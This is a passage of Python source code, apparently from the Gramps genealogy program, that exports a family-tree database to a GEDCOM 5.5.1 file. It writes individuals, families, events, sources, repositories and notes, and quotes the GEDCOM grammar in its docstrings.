LdsOrd.STATUS_SUBMITTED : "SUBMITTED", LdsOrd.STATUS_UNCLEARED : "UNCLEARED", } LANGUAGES = { 'cs' : 'Czech', 'da' : 'Danish', 'nl' : 'Dutch', 'en' : 'English', 'eo' : 'Esperanto', 'fi' : 'Finnish', 'fr' : 'French', 'de' : 'German', 'hu' : 'Hungarian', 'it' : 'Italian', 'lt' : 'Latvian', 'lv' : 'Lithuanian', 'no' : 'Norwegian', 'po' : 'Polish', 'pt' : 'Portuguese', 'ro' : 'Romanian', 'sk' : 'Slovak', 'es' : 'Spanish', 'sv' : 'Swedish', 'ru' : 'Russian', } 
#------------------------------------------------------------------------- # # # #------------------------------------------------------------------------- MIME2GED = { "image/bmp" : "bmp", "image/gif" : "gif", "image/jpeg" : "jpeg", "image/x-pcx" : "pcx", "image/tiff" : "tiff", "audio/x-wav" : "wav" } QUALITY_MAP = { Citation.CONF_VERY_HIGH : "3", Citation.CONF_HIGH : "2", Citation.CONF_LOW : "1", Citation.CONF_VERY_LOW : "0", } PEDIGREE_TYPES = { ChildRefType.BIRTH : 'birth', ChildRefType.STEPCHILD: 'Step', ChildRefType.ADOPTED : 'Adopted', ChildRefType.FOSTER : 'Foster', } NOTES_PER_PERSON = 104 # fudge factor to make progress meter a bit smoother #------------------------------------------------------------------------- # # sort_handles_by_id # #------------------------------------------------------------------------- def sort_handles_by_id(handle_list, handle_to_object): """ Sort a list of handles by the Gramps ID. The function that returns the object from the handle needs to be supplied so that we get the right object. """ sorted_list = [] for handle in handle_list: obj = handle_to_object(handle) if obj: data = (obj.get_gramps_id(), handle) sorted_list.append(data) sorted_list.sort() return sorted_list #------------------------------------------------------------------------- # # breakup # #------------------------------------------------------------------------- def breakup(txt, limit): """ Break a line of text into a list of strings that conform to the maximum length specified, while breaking words in the middle of a word to avoid issues with spaces. """ if limit < 1: raise ValueError("breakup: unexpected limit: %r" % limit) data = [] while len(txt) > limit: # look for non-space pair to break between # do not break within a UTF-8 byte sequence, i. e. first char >127 idx = limit while (idx > 0 and (txt[idx - 1].isspace() or txt[idx].isspace() or ord(txt[idx - 1]) > 127)): idx -= 1 if idx == 0: #no words to break on, just break at limit anyway idx = limit data.append(txt[:idx]) txt = txt[idx:] if len(txt) > 0: data.append(txt) return data #------------------------------------------------------------------------- # # event_has_subordinate_data # may want to compare description w/ auto-generated one, and # if so, treat it same as if it were empty for this purpose # #------------------------------------------------------------------------- def event_has_subordinate_data(event, event_ref): """ determine if event is empty or not """ if event and event_ref: return (event.get_description().strip() or not event.get_date_object().is_empty() or event.get_place_handle() or event.get_attribute_list() or event_ref.get_attribute_list() or event.get_note_list() or event.get_citation_list() or event.get_media_list()) else: return False #------------------------------------------------------------------------- # # GedcomWriter class # #------------------------------------------------------------------------- class GedcomWriter(UpdateCallback): """ The GEDCOM writer creates a GEDCOM file that contains the exported information from the database. It derives from UpdateCallback so that it can provide visual feedback via a progress bar if needed. 
""" def __init__(self, database, user, option_box=None): UpdateCallback.__init__(self, user.callback) self.dbase = database self.dirname = None self.gedcom_file = None self.progress_cnt = 0 self.setup(option_box) def setup(self, option_box): """ If the option_box is present (GUI interface), then we check the "private", "restrict", and "cfilter" arguments to see if we need to apply proxy databases. """ if option_box: option_box.parse_options() self.dbase = option_box.get_filtered_database(self.dbase, self) def write_gedcom_file(self, filename): """ Write the actual GEDCOM file to the specified filename. """ self.dirname = os.path.dirname(filename) with open(filename, "w", encoding='utf-8') as self.gedcom_file: person_len = self.dbase.get_number_of_people() family_len = self.dbase.get_number_of_families() source_len = self.dbase.get_number_of_sources() repo_len = self.dbase.get_number_of_repositories() note_len = self.dbase.get_number_of_notes() / NOTES_PER_PERSON total_steps = (person_len + family_len + source_len + repo_len + note_len) self.set_total(total_steps) self._header(filename) self._submitter() self._individuals() self._families() self._sources() self._repos() self._notes() self._writeln(0, "TRLR") return True def _writeln(self, level, token, textlines="", limit=72): """ Write a line of text to the output file in the form of: LEVEL TOKEN text If the line contains newlines, it is broken into multiple lines using the CONT token. If any line is greater than the limit, it will broken into multiple lines using CONC. """ assert token if textlines: # break the line into multiple lines if a newline is found textlines = textlines.replace('\n\r', '\n') textlines = textlines.replace('\r', '\n') # Need to double '@' See Gedcom 5.5 spec 'any_char' if not textlines.startswith('@'): # avoid xrefs textlines = textlines.replace('@', '@@') textlist = textlines.split('\n') token_level = level for text in textlist: # make it unicode so that breakup below does the right thin. text = str(text) if limit: prefix = "\n%d CONC " % (level + 1) txt = prefix.join(breakup(text, limit)) else: txt = text self.gedcom_file.write("%d %s %s\n" % (token_level, token, txt)) token_level = level + 1 token = "CONT" else: self.gedcom_file.write("%d %s\n" % (level, token)) def _header(self, filename): """ Write the GEDCOM header. 
HEADER:= n HEAD {1:1} +1 SOUR <APPROVED_SYSTEM_ID> {1:1} +2 VERS <VERSION_NUMBER> {0:1} +2 NAME <NAME_OF_PRODUCT> {0:1} +2 CORP <NAME_OF_BUSINESS> {0:1} # Not used +3 <<ADDRESS_STRUCTURE>> {0:1} # Not used +2 DATA <NAME_OF_SOURCE_DATA> {0:1} # Not used +3 DATE <PUBLICATION_DATE> {0:1} # Not used +3 COPR <COPYRIGHT_SOURCE_DATA> {0:1} # Not used +1 DEST <RECEIVING_SYSTEM_NAME> {0:1*} # Not used +1 DATE <TRANSMISSION_DATE> {0:1} +2 TIME <TIME_VALUE> {0:1} +1 SUBM @XREF:SUBM@ {1:1} +1 SUBN @XREF:SUBN@ {0:1} +1 FILE <FILE_NAME> {0:1} +1 COPR <COPYRIGHT_GEDCOM_FILE> {0:1} +1 GEDC {1:1} +2 VERS <VERSION_NUMBER> {1:1} +2 FORM <GEDCOM_FORM> {1:1} +1 CHAR <CHARACTER_SET> {1:1} +2 VERS <VERSION_NUMBER> {0:1} +1 LANG <LANGUAGE_OF_TEXT> {0:1} +1 PLAC {0:1} +2 FORM <PLACE_HIERARCHY> {1:1} +1 NOTE <GEDCOM_CONTENT_DESCRIPTION> {0:1} +2 [CONT|CONC] <GEDCOM_CONTENT_DESCRIPTION> {0:M} """ local_time = time.localtime(time.time()) (year, mon, day, hour, minutes, sec) = local_time[0:6] date_str = "%d %s %d" % (day, libgedcom.MONTH[mon], year) time_str = "%02d:%02d:%02d" % (hour, minutes, sec) rname = self.dbase.get_researcher().get_name() self._writeln(0, "HEAD") self._writeln(1, "SOUR", "Gramps") self._writeln(2, "VERS", VERSION) self._writeln(2, "NAME", "Gramps") self._writeln(1, "DATE", date_str) self._writeln(2, "TIME", time_str) self._writeln(1, "SUBM", "@SUBM@") self._writeln(1, "FILE", filename, limit=255) self._writeln(1, "COPR", 'Copyright (c) %d %s.' % (year, rname)) self._writeln(1, "GEDC") self._writeln(2, "VERS", "5.5.1") self._writeln(2, "FORM", 'LINEAGE-LINKED') self._writeln(1, "CHAR", "UTF-8") # write the language string if the current LANG variable # matches something we know about. lang = glocale.language[0] if lang and len(lang) >= 2: lang_code = LANGUAGES.get(lang[0:2]) if lang_code: self._writeln(1, 'LANG', lang_code) def _submitter(self): """ n @<XREF:SUBM>@ SUBM {1:1} +1 NAME <SUBMITTER_NAME> {1:1} +1 <<ADDRESS_STRUCTURE>> {0:1} +1 <<MULTIMEDIA_LINK>> {0:M} # not used +1 LANG <LANGUAGE_PREFERENCE> {0:3} # not used +1 RFN <SUBMITTER_REGISTERED_RFN> {0:1} # not used +1 RIN <AUTOMATED_RECORD_ID> {0:1} # not used +1 <<CHANGE_DATE>> {0:1} # not used """ owner = self.dbase.get_researcher() name = owner.get_name() phon = owner.get_phone() mail = owner.get_email() self._writeln(0, "@SUBM@", "SUBM") self._writeln(1, "NAME", name) # Researcher is a sub-type of LocationBase, so get_city etc. which are # used in __write_addr work fine. However, the database owner street is # stored in address, so we need to temporarily copy it into street so # __write_addr works properly owner.set_street(owner.get_address()) self.__write_addr(1, owner) if phon: self._writeln(1, "PHON", phon) if mail: self._writeln(1, "EMAIL", mail) def _individuals(self): """ Write the individual people to the gedcom file. Since people like to have the list sorted by ID value, we need to go through a sorting step. We need to reset the progress bar, otherwise, people will be confused when the progress bar is idle. """ self.set_text(_("Writing individuals")) phandles = self.dbase.iter_person_handles() sorted_list = [] for handle in phandles: person = self.dbase.get_person_from_handle(handle) if person: data = (person.get_gramps_id(), handle) sorted_list.append(data) sorted_list.sort() for data in sorted_list: self.update() self._person(self.dbase.get_person_from_handle(data[1])) def _person(self, person): """ Write out a single person. 
n @XREF:INDI@ INDI {1:1} +1 RESN <RESTRICTION_NOTICE> {0:1} # not used +1 <<PERSONAL_NAME_STRUCTURE>> {0:M} +1 SEX <SEX_VALUE> {0:1} +1 <<INDIVIDUAL_EVENT_STRUCTURE>> {0:M} +1 <<INDIVIDUAL_ATTRIBUTE_STRUCTURE>> {0:M} +1 <<LDS_INDIVIDUAL_ORDINANCE>> {0:M} +1 <<CHILD_TO_FAMILY_LINK>> {0:M} +1 <<SPOUSE_TO_FAMILY_LINK>> {0:M} +1 SUBM @<XREF:SUBM>@ {0:M} +1 <<ASSOCIATION_STRUCTURE>> {0:M} +1 ALIA @<XREF:INDI>@ {0:M} +1 ANCI @<XREF:SUBM>@ {0:M} +1 DESI @<XREF:SUBM>@ {0:M} +1 <<SOURCE_CITATION>> {0:M} +1 <<MULTIMEDIA_LINK>> {0:M} ,* +1 <<NOTE_STRUCTURE>> {0:M} +1 RFN <PERMANENT_RECORD_FILE_NUMBER> {0:1} +1 AFN <ANCESTRAL_FILE_NUMBER> {0:1} +1 REFN <USER_REFERENCE_NUMBER> {0:M} +2 TYPE <USER_REFERENCE_TYPE> {0:1} +1 RIN <AUTOMATED_RECORD_ID> {0:1} +1 <<CHANGE_DATE>> {0:1} """ if person is None: return self._writeln(0, "@%s@" % person.get_gramps_id(), "INDI") self._names(person) self._gender(person) self._person_event_ref('BIRT', person.get_birth_ref()) self._person_event_ref('DEAT', person.get_death_ref()) self._remaining_events(person) self._attributes(person) self._lds_ords(person, 1) self._child_families(person) self._parent_families(person) self._assoc(person, 1) self._person_sources(person) self._addresses(person) self._photos(person.get_media_list(), 1) self._url_list(person, 1) self._note_references(person.get_note_list(), 1) self._change(person.get_change_time(), 1) def _assoc(self, person, level): """ n ASSO @<XREF:INDI>@ {0:M} +1 RELA <RELATION_IS_DESCRIPTOR> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} """ for ref in person.get_person_ref_list(): person = self.dbase.get_person_from_handle(ref.ref) if person: self._writeln(level, "ASSO", "@%s@" % person.get_gramps_id()) self._writeln(level + 1, "RELA", ref.get_relation()) self._note_references(ref.get_note_list(), level + 1) self._source_references(ref.get_citation_list(), level + 1) def _note_references(self, notelist, level): """ Write out the list of note handles to the current level. We use the Gramps ID as the XREF for the GEDCOM file. """ for note_handle in notelist: note = self.dbase.get_note_from_handle(note_handle) if note: self._writeln(level, 'NOTE', '@%s@' % note.get_gramps_id()) def _names(self, person): """ Write the names associated with the person to the current level. Since nicknames in version < 3.3 are separate from the name structure, we search the attribute list to see if we can find a nickname. Because we do not know the mappings, we just take the first nickname we find, and add it to the primary name. If a nickname is present in the name structure, it has precedence """ nicknames = [attr.get_value() for attr in person.get_attribute_list() if int(attr.get_type()) == AttributeType.NICKNAME] if len(nicknames) > 0: nickname = nicknames[0] else: nickname = "" self._person_name(person.get_primary_name(), nickname) for name in person.get_alternate_names(): self._person_name(name, "") def _gender(self, person): """ Write out the gender of the person to the file. If the gender is not male or female, simply do not output anything. The only valid values are M (male) or F (female). So if the geneder is unknown, we output nothing. """ if person.get_gender() == Person.MALE: self._writeln(1, "SEX", "M") elif person.get_gender() == Person.FEMALE: self._writeln(1, "SEX", "F") def _lds_ords(self, obj, level): """ Simply loop through the list of LDS ordinances, and call the function that writes the LDS ordinance structure. 
""" for lds_ord in obj.get_lds_ord_list(): self.write_ord(lds_ord, level) def _remaining_events(self, person): """ Output all events associated with the person that are not BIRTH or DEATH events. Because all we have are event references, we have to extract the real event to discover the event type. """ global adop_written # adop_written is only shared between this function and # _process_person_event. This is rather ugly code, but it is difficult # to support an Adoption event without an Adopted relationship from the # parent(s), an Adopted relationship from the parent(s) without an # event, and both an event and a relationship. All these need to be # supported without duplicating the output of the ADOP GEDCOM tag. See # bug report 2370. adop_written = False for event_ref in person.get_event_ref_list(): event = self.dbase.get_event_from_handle(event_ref.ref) if not event: continue self._process_person_event(person, event, event_ref) if not adop_written: self._adoption_records(person, adop_written) def _process_person_event(self, person, event, event_ref): """ Process a person event, which is not a BIRTH or DEATH event. """ global adop_written etype = int(event.get_type()) # if the event is a birth or death, skip it. if etype in (EventType.BIRTH, EventType.DEATH): return role = int(event_ref.get_role()) # if the event role is not primary, skip the event. if role != EventRoleType.PRIMARY: return val = libgedcom.PERSONALCONSTANTEVENTS.get(etype, "").strip() if val and val.strip(): if val in NEEDS_PARAMETER: if event.get_description().strip(): self._writeln(1, val, event.get_description()) else: self._writeln(1, val) else: if event_has_subordinate_data(event, event_ref): self._writeln(1, val) else: self._writeln(1, val, 'Y') if event.get_description().strip(): self._writeln(2, 'TYPE', event.get_description()) else: descr = event.get_description() if descr: self._writeln(1, 'EVEN', descr) else: self._writeln(1, 'EVEN') if val.strip(): self._writeln(2, 'TYPE', val) else: self._writeln(2, 'TYPE', str(event.get_type())) self._dump_event_stats(event, event_ref) if etype == EventType.ADOPT and not adop_written: adop_written = True self._adoption_records(person, adop_written) def _adoption_records(self, person, adop_written): """ Write Adoption events for each child that has been adopted. n ADOP +1 <<INDIVIDUAL_EVENT_DETAIL>> +1 FAMC @<XREF:FAM>@ +2 ADOP <ADOPTED_BY_WHICH_PARENT> """ adoptions = [] for family in [self.dbase.get_family_from_handle(fh) for fh in person.get_parent_family_handle_list()]: if family is None: continue for child_ref in [ref for ref in family.get_child_ref_list() if ref.ref == person.handle]: if child_ref.mrel == ChildRefType.ADOPTED \ or child_ref.frel == ChildRefType.ADOPTED: adoptions.append((family, child_ref.frel, child_ref.mrel)) for (fam, frel, mrel) in adoptions: if not adop_written: self._writeln(1, 'ADOP', 'Y') self._writeln(2, 'FAMC', '@%s@' % fam.get_gramps_id()) if mrel == frel: self._writeln(3, 'ADOP', 'BOTH') elif mrel == ChildRefType.ADOPTED: self._writeln(3, 'ADOP', 'WIFE') else: self._writeln(3, 'ADOP', 'HUSB') def _attributes(self, person): """ Write out the attributes to the GEDCOM file. Since we have already looked at nicknames when we generated the names, we filter them out here. We use the GEDCOM 5.5.1 FACT command to write out attributes not built in to GEDCOM. 
""" # filter out the nicknames attr_list = [attr for attr in person.get_attribute_list() if attr.get_type() != AttributeType.NICKNAME] for attr in attr_list: attr_type = int(attr.get_type()) name = libgedcom.PERSONALCONSTANTATTRIBUTES.get(attr_type) key = str(attr.get_type()) value = attr.get_value().strip().replace('\r', ' ') if key in ("AFN", "RFN", "REFN", "_UID", "_FSFTID"): self._writeln(1, key, value) continue if key == "RESN": self._writeln(1, 'RESN') continue if name and name.strip(): self._writeln(1, name, value) elif value: self._writeln(1, 'FACT', value) self._writeln(2, 'TYPE', key) else: continue self._note_references(attr.get_note_list(), 2) self._source_references(attr.get_citation_list(), 2) def _source_references(self, citation_list, level): """ Loop through the list of citation handles, writing the information to the file. """ for citation_handle in citation_list: self._source_ref_record(level, citation_handle) def _addresses(self, person): """ Write out the addresses associated with the person as RESI events. """ for addr in person.get_address_list(): self._writeln(1, 'RESI') self._date(2, addr.get_date_object()) self.__write_addr(2, addr) if addr.get_phone(): self._writeln(2, 'PHON', addr.get_phone()) self._note_references(addr.get_note_list(), 2) self._source_references(addr.get_citation_list(), 2) def _photos(self, media_list, level): """ Loop through the list of media objects, writing the information to the file. """ for photo in media_list: self._photo(photo, level) def _child_families(self, person): """ Write the Gramps ID as the XREF for each family in which the person is listed as a child. """ # get the list of familes from the handle list family_list = [self.dbase.get_family_from_handle(hndl) for hndl in person.get_parent_family_handle_list()] for family in family_list: if family: self._writeln(1, 'FAMC', '@%s@' % family.get_gramps_id()) for child in family.get_child_ref_list(): if child.get_reference_handle() == person.get_handle(): if child.frel == ChildRefType.ADOPTED and \ child.mrel == ChildRefType.ADOPTED: self._writeln(2, 'PEDI adopted') elif child.frel == ChildRefType.BIRTH and \ child.mrel == ChildRefType.BIRTH: self._writeln(2, 'PEDI birth') elif child.frel == ChildRefType.STEPCHILD and \ child.mrel == ChildRefType.STEPCHILD: self._writeln(2, 'PEDI stepchild') elif child.frel == ChildRefType.FOSTER and \ child.mrel == ChildRefType.FOSTER: self._writeln(2, 'PEDI foster') elif child.frel == child.mrel: self._writeln(2, 'PEDI Unknown') else: self._writeln(2, '_FREL %s' % PEDIGREE_TYPES.get(child.frel.value, "Unknown")) self._writeln(2, '_MREL %s' % PEDIGREE_TYPES.get(child.mrel.value, "Unknown")) def _parent_families(self, person): """ Write the Gramps ID as the XREF for each family in which the person is listed as a parent. """ # get the list of familes from the handle list family_list = [self.dbase.get_family_from_handle(hndl) for hndl in person.get_family_handle_list()] for family in family_list: if family: self._writeln(1, 'FAMS', '@%s@' % family.get_gramps_id()) def _person_sources(self, person): """ Loop through the list of citations, writing the information to the file. 
""" for citation_handle in person.get_citation_list(): self._source_ref_record(1, citation_handle) def _url_list(self, obj, level): """ For Person's FAX, PHON, EMAIL, WWW lines; n PHON <PHONE_NUMBER> {0:3} n EMAIL <ADDRESS_EMAIL> {0:3} n FAX <ADDRESS_FAX> {0:3} n WWW <ADDRESS_WEB_PAGE> {0:3} n OBJE {1:1} +1 FORM <MULTIMEDIA_FORMAT> {1:1} +1 TITL <DESCRIPTIVE_TITLE> {0:1} +1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} """ for url in obj.get_url_list(): if url.get_type() == UrlType.EMAIL: self._writeln(level, 'EMAIL', url.get_path()) elif url.get_type() == UrlType.WEB_HOME: self._writeln(level, 'WWW', url.get_path()) elif url.get_type() == _('Phone'): self._writeln(level, 'PHON', url.get_path()) elif url.get_type() == _('FAX'): self._writeln(level, 'FAX', url.get_path()) else: self._writeln(level, 'OBJE') self._writeln(level + 1, 'FORM', 'URL') if url.get_description(): self._writeln(level + 1, 'TITL', url.get_description()) if url.get_path(): self._writeln(level + 1, 'FILE', url.get_path(), limit=255) def _families(self): """ Write out the list of families, sorting by Gramps ID. """ self.set_text(_("Writing families")) # generate a list of (GRAMPS_ID, HANDLE) pairs. This list # can then be sorted by the sort routine, which will use the # first value of the tuple as the sort key. sorted_list = sort_handles_by_id(self.dbase.get_family_handles(), self.dbase.get_family_from_handle) # loop through the sorted list, pulling of the handle. This list # has already been sorted by GRAMPS_ID for family_handle in [hndl[1] for hndl in sorted_list]: self.update() self._family(self.dbase.get_family_from_handle(family_handle)) def _family(self, family): """ n @<XREF:FAM>@ FAM {1:1} +1 RESN <RESTRICTION_NOTICE> {0:1) +1 <<FAMILY_EVENT_STRUCTURE>> {0:M} +1 HUSB @<XREF:INDI>@ {0:1} +1 WIFE @<XREF:INDI>@ {0:1} +1 CHIL @<XREF:INDI>@ {0:M} +1 NCHI <COUNT_OF_CHILDREN> {0:1} +1 SUBM @<XREF:SUBM>@ {0:M} +1 <<LDS_SPOUSE_SEALING>> {0:M} +1 REFN <USER_REFERENCE_NUMBER> {0:M} """ if family is None: return gramps_id = family.get_gramps_id() self._writeln(0, '@%s@' % gramps_id, 'FAM') self._family_reference('HUSB', family.get_father_handle()) self._family_reference('WIFE', family.get_mother_handle()) self._lds_ords(family, 1) self._family_events(family) self._family_attributes(family.get_attribute_list(), 1) self._family_child_list(family.get_child_ref_list()) self._source_references(family.get_citation_list(), 1) self._photos(family.get_media_list(), 1) self._note_references(family.get_note_list(), 1) self._change(family.get_change_time(), 1) def _family_child_list(self, child_ref_list): """ Write the child XREF values to the GEDCOM file. """ child_list = [ self.dbase.get_person_from_handle(cref.ref).get_gramps_id() for cref in child_ref_list] for gid in child_list: if gid is None: continue self._writeln(1, 'CHIL', '@%s@' % gid) def _family_reference(self, token, person_handle): """ Write the family reference to the file. This is either 'WIFE' or 'HUSB'. As usual, we use the Gramps ID as the XREF value. """ if person_handle: person = self.dbase.get_person_from_handle(person_handle) if person: self._writeln(1, token, '@%s@' % person.get_gramps_id()) def _family_events(self, family): """ Output the events associated with the family. Because all we have are event references, we have to extract the real event to discover the event type. 
""" for event_ref in family.get_event_ref_list(): event = self.dbase.get_event_from_handle(event_ref.ref) if event is None: continue self._process_family_event(event, event_ref) self._dump_event_stats(event, event_ref) def _process_family_event(self, event, event_ref): """ Process a single family event. """ etype = int(event.get_type()) val = libgedcom.FAMILYCONSTANTEVENTS.get(etype) if val: if event_has_subordinate_data(event, event_ref): self._writeln(1, val) else: self._writeln(1, val, 'Y') if event.get_type() == EventType.MARRIAGE: self._family_event_attrs(event.get_attribute_list(), 2) if event.get_description().strip() != "": self._writeln(2, 'TYPE', event.get_description()) else: descr = event.get_description() if descr: self._writeln(1, 'EVEN', descr) else: self._writeln(1, 'EVEN') the_type = str(event.get_type()) if the_type: self._writeln(2, 'TYPE', the_type) def _family_event_attrs(self, attr_list, level): """ Write the attributes associated with the family event. The only ones we really care about are FATHER_AGE and MOTHER_AGE which we translate to WIFE/HUSB AGE attributes. """ for attr in attr_list: if attr.get_type() == AttributeType.FATHER_AGE: self._writeln(level, 'HUSB') self._writeln(level + 1, 'AGE', attr.get_value()) elif attr.get_type() == AttributeType.MOTHER_AGE: self._writeln(level, 'WIFE') self._writeln(level + 1, 'AGE', attr.get_value()) def _family_attributes(self, attr_list, level): """ Write out the attributes associated with a family to the GEDCOM file. Since we have already looked at nicknames when we generated the names, we filter them out here. We use the GEDCOM 5.5.1 FACT command to write out attributes not built in to GEDCOM. """ for attr in attr_list: attr_type = int(attr.get_type()) name = libgedcom.FAMILYCONSTANTATTRIBUTES.get(attr_type) key = str(attr.get_type()) value = attr.get_value().replace('\r', ' ') if key in ("AFN", "RFN", "REFN", "_UID"): self._writeln(1, key, value) continue if name and name.strip(): self._writeln(1, name, value) continue else: self._writeln(1, 'FACT', value) self._writeln(2, 'TYPE', key) self._note_references(attr.get_note_list(), level + 1) self._source_references(attr.get_citation_list(), level + 1) def _sources(self): """ Write out the list of sources, sorting by Gramps ID. """ self.set_text(_("Writing sources")) sorted_list = sort_handles_by_id(self.dbase.get_source_handles(), self.dbase.get_source_from_handle) for (source_id, handle) in sorted_list: self.update() source = self.dbase.get_source_from_handle(handle) if source is None: continue self._writeln(0, '@%s@' % source_id, 'SOUR') if source.get_title(): self._writeln(1, 'TITL', source.get_title()) if source.get_author(): self._writeln(1, "AUTH", source.get_author()) if source.get_publication_info(): self._writeln(1, "PUBL", source.get_publication_info()) if source.get_abbreviation(): self._writeln(1, 'ABBR', source.get_abbreviation()) self._photos(source.get_media_list(), 1) for reporef in source.get_reporef_list(): self._reporef(reporef, 1) # break self._note_references(source.get_note_list(), 1) self._change(source.get_change_time(), 1) def _notes(self): """ Write out the list of notes, sorting by Gramps ID. 
""" self.set_text(_("Writing notes")) note_cnt = 0 sorted_list = sort_handles_by_id(self.dbase.get_note_handles(), self.dbase.get_note_from_handle) for note_handle in [hndl[1] for hndl in sorted_list]: # the following makes the progress bar a bit smoother if not note_cnt % NOTES_PER_PERSON: self.update() note_cnt += 1 note = self.dbase.get_note_from_handle(note_handle) if note is None: continue self._note_record(note) def _note_record(self, note): """ n @<XREF:NOTE>@ NOTE <SUBMITTER_TEXT> {1:1} +1 [ CONC | CONT] <SUBMITTER_TEXT> {0:M} +1 <<SOURCE_CITATION>> {0:M} +1 REFN <USER_REFERENCE_NUMBER> {0:M} +2 TYPE <USER_REFERENCE_TYPE> {0:1} +1 RIN <AUTOMATED_RECORD_ID> {0:1} +1 <<CHANGE_DATE>> {0:1} """ if note: self._writeln(0, '@%s@' % note.get_gramps_id(), 'NOTE ' + note.get()) def _repos(self): """ Write out the list of repositories, sorting by Gramps ID. REPOSITORY_RECORD:= n @<XREF:REPO>@ REPO {1:1} +1 NAME <NAME_OF_REPOSITORY> {1:1} +1 <<ADDRESS_STRUCTURE>> {0:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 REFN <USER_REFERENCE_NUMBER> {0:M} +2 TYPE <USER_REFERENCE_TYPE> {0:1} +1 RIN <AUTOMATED_RECORD_ID> {0:1} +1 <<CHANGE_DATE>> {0:1} """ self.set_text(_("Writing repositories")) sorted_list = sort_handles_by_id(self.dbase.get_repository_handles(), self.dbase.get_repository_from_handle) # GEDCOM only allows for a single repository per source for (repo_id, handle) in sorted_list: self.update() repo = self.dbase.get_repository_from_handle(handle) if repo is None: continue self._writeln(0, '@%s@' % repo_id, 'REPO') if repo.get_name(): self._writeln(1, 'NAME', repo.get_name()) for addr in repo.get_address_list(): self.__write_addr(1, addr) if addr.get_phone(): self._writeln(1, 'PHON', addr.get_phone()) for url in repo.get_url_list(): if url.get_type() == UrlType.EMAIL: self._writeln(1, 'EMAIL', url.get_path()) elif url.get_type() == UrlType.WEB_HOME: self._writeln(1, 'WWW', url.get_path()) elif url.get_type() == _('FAX'): self._writeln(1, 'FAX', url.get_path()) self._note_references(repo.get_note_list(), 1) def _reporef(self, reporef, level): """ n REPO [ @XREF:REPO@ | <NULL>] {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 CALN <SOURCE_CALL_NUMBER> {0:M} +2 MEDI <SOURCE_MEDIA_TYPE> {0:1} """ if reporef.ref is None: return repo = self.dbase.get_repository_from_handle(reporef.ref) if repo is None: return repo_id = repo.get_gramps_id() self._writeln(level, 'REPO', '@%s@' % repo_id) self._note_references(reporef.get_note_list(), level + 1) if reporef.get_call_number(): self._writeln(level + 1, 'CALN', reporef.get_call_number()) if reporef.get_media_type(): self._writeln(level + 2, 'MEDI', str(reporef.get_media_type())) def _person_event_ref(self, key, event_ref): """ Write out the BIRTH and DEATH events for the person. 
""" if event_ref: event = self.dbase.get_event_from_handle(event_ref.ref) if event_has_subordinate_data(event, event_ref): self._writeln(1, key) else: self._writeln(1, key, 'Y') if event.get_description().strip() != "": self._writeln(2, 'TYPE', event.get_description()) self._dump_event_stats(event, event_ref) def _change(self, timeval, level): """ CHANGE_DATE:= n CHAN {1:1} +1 DATE <CHANGE_DATE> {1:1} +2 TIME <TIME_VALUE> {0:1} +1 <<NOTE_STRUCTURE>> # not used """ self._writeln(level, 'CHAN') time_val = time.gmtime(timeval) self._writeln(level + 1, 'DATE', '%d %s %d' % ( time_val[2], libgedcom.MONTH[time_val[1]], time_val[0])) self._writeln(level + 2, 'TIME', '%02d:%02d:%02d' % ( time_val[3], time_val[4], time_val[5])) def _dump_event_stats(self, event, event_ref): """ Write the event details for the event, using the event and event reference information. GEDCOM does not make a distinction between the two. """ dateobj = event.get_date_object() self._date(2, dateobj) if self._datewritten: # write out TIME if present times = [attr.get_value() for attr in event.get_attribute_list() if int(attr.get_type()) == AttributeType.TIME] # Not legal, but inserted by PhpGedView if len(times) > 0: self._writeln(3, 'TIME', times[0]) place = None if event.get_place_handle(): place = self.dbase.get_place_from_handle(event.get_place_handle()) self._place(place, dateobj, 2) for attr in event.get_attribute_list(): attr_type = attr.get_type() if attr_type == AttributeType.CAUSE: self._writeln(2, 'CAUS', attr.get_value()) elif attr_type == AttributeType.AGENCY: self._writeln(2, 'AGNC', attr.get_value()) elif attr_type == _("Phone"): self._writeln(2, 'PHON', attr.get_value()) elif attr_type == _("FAX"): self._writeln(2, 'FAX', attr.get_value()) elif attr_type == _("EMAIL"): self._writeln(2, 'EMAIL', attr.get_value()) elif attr_type == _("WWW"): self._writeln(2, 'WWW', attr.get_value()) for attr in event_ref.get_attribute_list(): attr_type = attr.get_type() if attr_type == AttributeType.AGE: self._writeln(2, 'AGE', attr.get_value()) elif attr_type == AttributeType.FATHER_AGE: self._writeln(2, 'HUSB') self._writeln(3, 'AGE', attr.get_value()) elif attr_type == AttributeType.MOTHER_AGE: self._writeln(2, 'WIFE') self._writeln(3, 'AGE', attr.get_value()) self._note_references(event.get_note_list(), 2) self._source_references(event.get_citation_list(), 2) self._photos(event.get_media_list(), 2) if place: self._photos(place.get_media_list(), 2) def write_ord(self, lds_ord, index): """ LDS_INDIVIDUAL_ORDINANCE:= [ n [ BAPL | CONL ] {1:1} +1 DATE <DATE_LDS_ORD> {0:1} +1 TEMP <TEMPLE_CODE> {0:1} +1 PLAC <PLACE_LIVING_ORDINANCE> {0:1} +1 STAT <LDS_BAPTISM_DATE_STATUS> {0:1} +2 DATE <CHANGE_DATE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} p.39 | n ENDL {1:1} +1 DATE <DATE_LDS_ORD> {0:1} +1 TEMP <TEMPLE_CODE> {0:1} +1 PLAC <PLACE_LIVING_ORDINANCE> {0:1} +1 STAT <LDS_ENDOWMENT_DATE_STATUS> {0:1} +2 DATE <CHANGE_DATE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} | n SLGC {1:1} +1 DATE <DATE_LDS_ORD> {0:1} +1 TEMP <TEMPLE_CODE> {0:1} +1 PLAC <PLACE_LIVING_ORDINANCE> {0:1} +1 FAMC @<XREF:FAM>@ {1:1} +1 STAT <LDS_CHILD_SEALING_DATE_STATUS> {0:1} +2 DATE <CHANGE_DATE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} +1 <<SOURCE_CITATION>> {0:M} ] """ self._writeln(index, LDS_ORD_NAME[lds_ord.get_type()]) self._date(index + 1, lds_ord.get_date_object()) if lds_ord.get_family_handle(): family_handle = lds_ord.get_family_handle() family = self.dbase.get_family_from_handle(family_handle) if family: 
